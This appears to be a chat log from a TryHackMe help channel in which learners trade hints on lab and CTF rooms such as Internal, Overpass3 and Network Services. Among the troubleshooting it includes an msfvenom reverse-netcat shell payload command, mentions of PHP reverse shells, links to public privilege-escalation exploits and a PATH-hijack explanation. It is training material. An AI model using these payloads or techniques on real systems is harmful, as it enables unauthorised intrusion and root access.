./bash: line 1: syntax error near unexpected token 'newline'
./bash: line 1: '<!DOCTYPE html>'
4
You downloaded a website and not the file
big oof... thanks
Gave +1 Rep to @versed shadow
already using so much ram
so its too low for a vm
as in here, i can do none of that, right?
since i cant deploy the linux machine
Don't you have an AttackBox there?
omg
you're right
im such an idiotttt
i just realised
i wasted so much time
thank u so much
another quick question. Doesn't the kali machine come with John the ripper?
The vm or the browser based Kali box?
the browser one
It should do, but I can't be certain as the kali one hasn't been updated in 2 years.
The attackbox has John though.
okay :) thanks, will use that one from now on!
I'm in the Phishing Emails 1 room on the last task before the conclusion and can't for the life of me figure out what they want for "What trusted entity is this email masquerading as?". I know I'm thinking too hard -- any hints? It's making me crazeee
like for example the email trys to make it seem it comes from Amazon
when it is really coming from somewhere else
Hmm I see what it looks like to me but it doesn't fit the answer spaces/asterisks. I'll keep fiddling with it...
I suppose I am blind, I still don't see what it could be. The answer space isn't laid out like a domain -- it's two words and it makes zero sense to me with what I see in the email3.eml file. Any help is appreciated, thanks.
@undone quail which section in the email3.eml do you think should be containing the answer to this question?
I would imagine in the header somewhere but I've looked through the whole thing and unless it's encoded somewhere, I just don't see it...
it is encoded.
You could also open the email in Thunderbird?
Alrighty I'll try to decode everything haha
try looking in a section that tells you about the email sender ;)
Ah man I opened it with Thunderbird and it was right in my face. Thanks affinity!!
Thanks Sarthak I got it!
Hello there after connecting to an ssh server I arrived directly on an irb prompt and I have to leave it, but if I do CTRL-D or if I type exit it takes me out of the ssh server, any tips on this ?
You should add the room and the task you are doing.
Hello, I'm currently going through the Network Services Room and hanging at Task 4, the last question. I am not able to log in only via the RSA key. It also requests a password. Can someone help me log in? The password is not just empty.
If you are sure that you specified the id_rsa in your ssh command correctly, you have to use the correct username to ssh with, if you are using the wrong username it's asking for a password.
How do I specify the id_rsa in my ssh command ? It did it just like in the writeup
Let me know what's the full command you used and I'll tell you if it's the right way
ssh cactus@10.10.144.69
Ok, then you are not specifying the key file in your command. To do that you have to use -i id_rsa in your command, if the id_rsa is in the same directory where you run the command from
If the id_rsa is not in the same directory you have to specify the path to the file like -i /home/tryhackme/id_rsa for example
Ahh, nice. It worked now. Was a bit confused because it's not mentioned in the Writeup. Thank you so much !
Hello, I have an issue in the room "fun with functional". I'm stuck when I upload the file in haskell, then I searched but I don't know where to look or what to do. Does anyone have a tip for me?
@fair flame Can you link the room?
Also please verify so you can share a screen shot where you're stuck.
!docs verify
Can anyone help me with the third Flag from this room: https://tryhackme.com/room/fileinc
https://tryhackme.com/room/funwithfunctional this is the room
@fair flame It's showing the room as private on my end
@wheat helm oh no its from my school, if you can't reach it I'm kaput… anyway thank you for trying
Gave +1 Rep to @wheat helm
Hi everyone. I'm completely stuck on the room 'Internal'. I'm still quite a beginner but I've exhausted pretty much every idea I've had (which aren't many). I have access to the system as www-data in a simple php reverse shell. But I have no idea how I could escalate. Could somebody give me a hint as to where I'm supposed to look?
The room in question:
https://tryhackme.com/room/internal
I've been sifting through the output of linpeas.sh. And so far I've found two vulns that looked promising:
https://www.exploit-db.com/exploits/47166, which I can't get to work because the exploit needs gcc which isn't installed on the system
https://www.exploit-db.com/exploits/49521, No idea what I'm doing wrong with this one
never did this room, but u could try this https://github.com/worawit/CVE-2021-3156
Thanks for the tip! I'll check it out
Omg this worked like a charm. Problem is, once you get the escalated shell, you don't get a prompt. So I've been waiting for that script to finish for a bit now, while in fact it was already finished lmao
prompt is #
Ye, there wasn't anything
Hello, question about the Nessus room, task 5
which VM do they mean you have to scan?
do you have to start the machine from task 4 again?
I am currently doing the final task on Upload Vulnerabilities
I got the shell uploaded and tried to execute it via the admin page. The page loads for a while and then states the module was not found. I have nc running and configured the shell correctly I think. Anything I might have missed?
I am in Network services and stuck on Task 4 -
Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
Is there someone who can help me with cybercrafted? I found the ssh private key, cracked it but still can't log into ssh?
Got it?
nope
Hint: Then "get" it
Spoiler: ||Download the .txt file you found and "cat" it||
@white salmon thanks will give that a go when I get back there - my machine ran out of time for now - I try cat on it but had not downloaded first
Gave +1 Rep to @versed shadow
God I just finished the room the exact same way, somehow it feels that this is not the expected way of solving the room tho...
I thought so too, but it worked none the less. I still learned a lot about enumeration so I think it was worth :D
One important thing for the room Cross-site Scripting is that you must be logged in first to solve the question or it won't give you the flag.
Anyone available to assist with easy room "Easy Peasy"?
Kinda stuck here: What is the password to login to the machine via SSH?
||I found the image and cracked the Gost hash. However, when I use Steghide and try to extract the content of the picture, the passphrase isn't working.||
I figured it out. I downloaded the wrong picture from the page. There are two pictures and I needed to use the one called ||binarycodepixabay.jpg||
Are you on the attackbox or your own machine ?
Can you open 10.10.10.10 in your machines browser ?
If you check ip a s do you only see a tun0 interface or any extra like tun1, tun2 etc ?
Did you ever receive a rev shell on your machine ?
I mean, maybe you always used the attackbox and that's the first time you use your local machine as attacking machine and therefore never caught a rev shell on your local machine previously?
Mh, maybe check your uploaded rev shell IP and port if they match your tun0 IP and listening port
Also you could check sudo ufw status if there might be a firewall active
Hello guys, i'm looking for a hint about the Willow machine: i've enumerated the NFS shares retrieving the only available file but i'm honestly stuck..
i cant verify
What does it mean when I can't ssh to a machine when it has an open ssh port? It displays the error "Permission denied (publickey)"
Hey could I get a hint for the room Overpass3. I've found the backup, gotten the information from the spreadsheet and I've been able to log into ftp with paradox's account. I have no idea where to go from here, can't find any way to actually gain access to the machine.
https://tryhackme.com/room/overpass3hosting
You can do many things with ftp
Maybe try to figure out where the FTP folder is
Hello all! I feel as though I've lost my mind on a problem that shouldn't be that hard - "Authentication Bypass" module has a section for "Brute Force" in which I am required to use:
ffuf tool
I've typed the command in the terminal a few different times in order to get the valid username/password and no luck so far
I've checked, rechecked syntax and not getting results, nor am I understanding what I should do different
any help would be greatly appreciated
So you got the valid usernames already right?
In case you do, check that valid usernames file, it should only contain the usernames, 1 per line and no status codes, size or similar.
Thanks for the tip! I was able to get a revshell using php, should've been a bit more obvious for me haha. But I got stuck again after getting access to paradox's account. So I looked up a writeup (multiple actually), and it seems I overestimated my skills. This room was a bit too hard for me, so I've left it at that and I'm going to continue doing some easier ones. I did learn a lot though so it wasn't in vain
Gave +1 Rep to @ripe hedge
I was able to spot the NFS exploit without a writeup though (with linpeas.sh) so I'm kinda happy about that, but I don't know much about active directory yet. So I'm going to focus on that now.
Curious, what suggested Active Directory there? There wasn't any in that box
Well, linpeas.sh gave this in it's output:
-rw-r--r--. 1 root root 54 Nov 18 2020 /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
It's also very possible I'm confused as to what NFS and active directories are. But that's what I thought
Oh shit you're the guy from Overpass that keeps forgetting his password
Excellent rooms, I've learned alot from them already
Yeah it's not Active Directory related
Active Directory is a lot of SMB, no NFS
Aaaah my bad, sorry
Room hint for Pickle Rick, do I need to bypass/exploit login on http://[MACHINE_IP/login.php]
You need to log in.
The box "PATH" in this room uses a compiled program called "test" that comes already on the box and doesn't say anything about the creation or a download link. In fact it's preset to run a file named "thm" that they want user to create. In order for this to be a viable method of privEsc, I was wondering if anyone knew more about where this program came from (like a site gtfobins) or does it just have to be coded as a "as needed". https://tryhackme.com/room/linprivesc#
I scp'd the file but I'm wondering if I'd actually be able to use it or not. To be 100% honest I struggled comprehending this room.. I think I got the overall gist of things, but not sure why this program was needed..
Its purpose is to demonstrate a path exploit. You need a program that runs as root in order to exploit the path.
so in a real scenario i would look for a suid binary such as base64 or something ??
In a more realistic scenario, you would look for a file that has those permissions.
Exactly.
ok.. makes sense.. but why wouldnt i just exploit that instead of going through all the mess of adding a $PATH variable?
If you want to learn more about path exploit, there is great room for that. It's a walkthrough room. Very well documented.
cool.. Ill check it.. Thanks
Not every SUID is exploitable by itself. But that SUID might run a different program without specifying its path.
So you can create a fake program with an identical name that runs a shell, and since the SUID is going to run that fake program as root, you get a root shell.
But whatever I am going to tell you here, is worthless compared to that room I suggested to you :)
#general message :))
lol.. well i already now understand the point of that binary thanks to you so the room must be SWEET!! lol
.. Thanks again
Thank you
Gave +1 Rep to @versed shadow
does anyone know how to properly pull a hash from rubeus into hashcat? I feel like an idiot because I can't get hashcat to recognize the hash and I know it's an issue with formatting. What's the best practice for this?
I keep getting this issue... doing Basic Pentesting and got the first user and their password. I established an ssh connection and put linpeas on it via scp. But when running it, it does not seem to continue. I just get this... any idea why?
how would I verify against connection issues? I have this problems across several rooms
Can I share a screen shot of a problem I have in linux fundamentals 3 beginners
I started a http server but it is just idle
nothin is happening
I cant type anything either
I was supposed to download it using wget
!docs verify if you still want to send that screen shot
!docs verify
After you deploy the python3 server show a print screen of it. After you deploy it you need to open a new terminal and use wget.
I don't know if you can use the wget in the same terminal that you started the python3 server, at least this is how i did it, i got stuck there also...
you need new instance, on one window you run http.server on other you download the file
Or you could open the python server in the background, thought of it after i wrote the message.
Hey. I have weird problem with "Attacking Kerberos" room. One of the questions is:
What two services make up KDC?"
and the answer format is **,***
however, ||AS,TGS|| seems not to be the right answer
what do you think the probability is that it is case sensitive in the answers section????
I think I don't get your point. I've tried providing in capitals and in lowercase, also in a mix of both
do I really need to brute force it?
Maybe have the first letter capitalized in each one?
|| AS, TGS || doesn't work?
oh damn
Maybe are a space after the second word
I didn't notice that f*cking space -.-
thanks @junior wave and sorry for bothering you guys
Gave +1 Rep to @junior wave
ok, probably that was a sign to get rest
ah yeah shadow missed that the space was missing too
New to this stuff...will keep it short. Working on Network Services Enumerating Telnet. When I do a nmap scan (nmap [IP]) I'm seeing ports opened between 1-1000 and apparently I'm not supposed to in this room. It's the one where telnet is assigned to non-standard 8012. What am I doing wrong? I've used different switches but open ports are open ports.
22 open ssh
80 open http
111 open rpcbind
and 3 more
What's the nmap command you ran?
I've used:
Per directions started with: nmap -A -p- [IP]
Tried: nmap [IP]
Did some looking and found out the port is (non-standard telnet 8012), went back to try: nmap -p 8000-8050 [IP] and didn't show that port.
I've tried resetting the attackbox also thinking something might be wrong but I get the same results. From what I see I'm showing ports open that shouldn't be and can't find the one that should be.
I've moved on to the FTP portion of that room and oddly enough I don't show FTP port 21 open either. Can't complete the room without these working. Not sure what I'm missing here.
Try ||--top-ports|| command/flag
I think I figured it out. Looks like I have to close and open the AttackBox in each section (SMB, Telnet, FTP) in the Network Services room. I thought I could just use the same machine. It's working now. Thanks!
Gave +1 Rep to @junior wave
Yes you'll have to use the machine for the specific task, good job on figuring it out yourself
There is a difference between the AttackBox and the VMs used in those tasks - the AttackBox is the VM provided by THM to be your launching point for on-network activities; that's not the same thing as the target machine that you need to spawn to complete certain tasks
Congrats on mod!
upload vulnerabilities room can t access site
Hey ! small hint on how to get in influx database in sweettooth inc ?
try looking for CVEs
Yop, got it, my bad
Hello i was doing the john the ripper room and i was a bit confused for the question in TASK4,question 3 where it asks the question "what is the value of the cracked hash"
I cant send a photo but i typed
"john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash1.txt"
the directory im running the command is /home/mrblue/Desktop/first_task_hashes
What I get is
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
No password hashes left to crack (see FAQ)
SORRY FOR THE SPAM
This is very vague. You're more likely to get help if you provide detail about the problem.
#room-help message Here's a list of good questions to answer when you want help.
Can someone Help with this I am on What is Networking? and the question is What is each section of an IP address called? and i am a bit stuck on it.
Are you sure you didn't find the answer in the task?
I suggest you take another look at it, but if you really want i can give you the direct answer, your choice
Please tell me i just cant find it.
||"An IP address is a set of numbers that are divided into four octets".
The answer is octet, it's right below the explanation for the IP Addresses||
Oh thank you!
welcome
Hi, am on Network Room 2 on MySQL exploit. Confused on cracking the final flag. Any hints to get it
Can i get a hint about this one its Intro To LAN and the question is What is the verb given to the job that Routers perform?
Read the text below "What is a Router?"
oh okay thanks
Forget about my question i got it
||search for mysql_hashdump||
||set options that need||
||use john the ripper to crack hash||
||ssh||
Got non related user name and cracked that user password but got confused where to look for MySql.txt
Tried running module MySQL_Hashdumb with the new user credentials set and ran it again but not getting anything
try to use find command
to find MySQL
focus on your first path in when ssh
Ok thanks
Looking for a nudge on 'VulnNet Internal' room. Captured first flag, not sure where to go for the 2nd.
i was doing unquoted service path in windows priv esc room
and whenever i place the common.exe file in the folder the defender removes it
need help
Hi! I did the room https://tryhackme.com/room/linprivesc task 9. is there anyway to know that the cron working or not? because i cannot get my simple reverse shell to be fired up
Check the permissions of the file you want cron to execute
it is -rw-r--r-- 1 karen karen 148 Jan 10 23:14 backup.sh
Right, so I guess you see the issue ?
i see. hahahaha
thanks @left thunder
Gave +1 Rep to @left thunder
work!!!
I'm doing the metasploit room, and the exploit its having you do isn't creating a session
ahh, it seems to be giving bad order of instructions
I got it to work
hi guys! I need help for the last question for this room. https://tryhackme.com/room/contiransomwarehgh. I am probably missing something in the research or the answer form. Any help?
Not sure what exactly the site is asking for in the new Red Team Threat Intel room. I've completed the room, but want to get the right answers for that site.
same like theres a huge amount of variation that could go into those correct answers so only knowing if its all or none is kind of rough
Guess we could ask @solemn smelt directly.
The task implied that you would need to get the flag to answer the question, but the question doesn't actually prompt for input. Otherwise I'd still be banging my head against the kill chain.
Hi there I have used SMB client to login as anonymous but I am having trouble accessing the text document, what am I doing wrong?
tried posting a Screenshot but I can
using command get Working From Home Information.txt
You have to verify your thm profile in discord first in order to send screenshots
!docs verify
But you have to find a way to get around the spaces in the file name. Maybe that's leading you towards it: https://stackoverflow.com/questions/12902227/how-to-input-a-path-with-a-white-space/12902280
so even if it is autocompleting the name of the item it still doesnt work?
If it's not auto completing it the way it needs to be to get around the spaces, then no.
thank you @left thunder I appreciate the nudge
Gave +1 Rep to @left thunder
i don't understand this question
its in nessus thm room
What Apache HTTP Server Version is reported by Nessus?
task 4 question 3
ok task 7 in the new red team threat intel room is really badly made. It is just a lot of trial and error
The static site doesn't give a lot of direction, but the questions that actually need answering are pretty straight-forward with the provided MITRE link.
yes its just the static site thing
The LOLBAS question did take a bit more digging, but the rest weren't too hard to find.
rest are easy
Oh I just noticed he updated the question to actually require an answer.
When I did the room it was an auto-complete question
great
still havent been able to find the ttp for the "exploitation" in the static site.
I'm in the new Red Team Threat Intel room but don't see how the LM Cyber Kill Chain is being mapped to the MITRE ATT&CK framework/Navigator. I'm stuck like you @gusty kite
Speaking of the red team threat intel room; I've got everything answered except for task 7 (view site) info for the APT 41. What's the format and requirement? I've tried both kill chain TXXX and events from Navigator. Nothing.
like I said - trial and error. for each of them try some of the TTPs marked with blue that match that particular part of the chain. press the "check answers" and if the red underline disappears then you found the right one and can move on to the next. There are multiple options to choose from for each part of the chain so it takes some time.
Thanks! I'll give this a try.
Gave +1 Rep to @gusty kite
||It's under Persistence in the navigator||
finally done!
Right. I guess what I'm struggling with is associating the 14 MITRE tactics to the 7 parts of the kill chain. (ie Weaponization(LMCKC) = Execution, Persistence & Priv Esc (MITRE). Some of the tactics/techniques could easily fall into multiple kill chain categories. And it looks like the kill chain answers are single words, which the TTPs are not always. Trial and error is fine, but for something that is more data model driven, I'd hope for something with less subjective interpretation.
not single word answers
Bah!
Where'd you find Delivery? Only one I'm stuck on
Nevermind
I must've spelled it wrong the first time
Just finished. Looking for the red line to disappear helped a ton. Thanks @gusty kite
Gave +1 Rep to @gusty kite
I thought it was my spell checker at first
Just finished, and they updated that question for the kill chain with actual answers for it. Not fair!
That hint would've helped lol
Hi there, ran this "msfvenom -p cmd/unix/reverse_netcat lhost=10.10.207.123 lport=4444 R", giving me this as a response: "Command 'msfvenom' is available in '/usr/local/bin/msfvenom'
The command could not be located because '/usr/local/bin' is not included in the PATH environment variable.
msfvenom: command not found" Do I need to download the command files?
Are you on the attackbox or your own machine?
attackbox
Could you show a screenshot of that? As usually msfvenom should work just fine, except you altered the PATH variable
I am probably just missing something
Hm, well do export PATH=/usr/local/bin:$PATH
i have tried several paths and searched the system for reverse_netcat with 0 results
tack "export PATH=/usr/local/bin:$PATH" to the end?
No just run that command on it's own. And after that try your msfvenom command again
Or run msfvenom with the absolute path. That should work too.
@left thunder nailed it thank you!
Gave +1 Rep to @left thunder
could you explain what was going on so i can help myself next time
Whenever you run a command, like msfvenom, ls, cat or whatever, it's going to check all the directories that are in the PATH variable to see if the binary for that command is there. So as msfvenom's binary is located in /usr/local/bin, that path has to be in the PATH variable in order to be found. As Gamer mentioned, you could have also just run it with the absolute path, like /usr/local/bin/msfvenom
Without the leading period, right? Cause that'll search in your current directory.
so, I did that with the absolute path, maybe I spelled it wrong but it didn't find anything there, going there now in the file system it isn't there either, Me = very confused
Ah ye you right
I mean, you said it was working after you added /usr/local/bin to the PATH variable, so that means it should be there.
ok I understand now, I found the command in there, so it would look like this? "/usr/local/bin/msfvenom -p cmd/unix/reverse_netcat lhost=10.10.207.123 lport=4444 R"
Looks right
Yes that should work too.
awesome @versed leaf @left thunder big help, thanks for walking me through it
Gave +1 Rep to @versed leaf
Seems like you are on cool down, but it's fine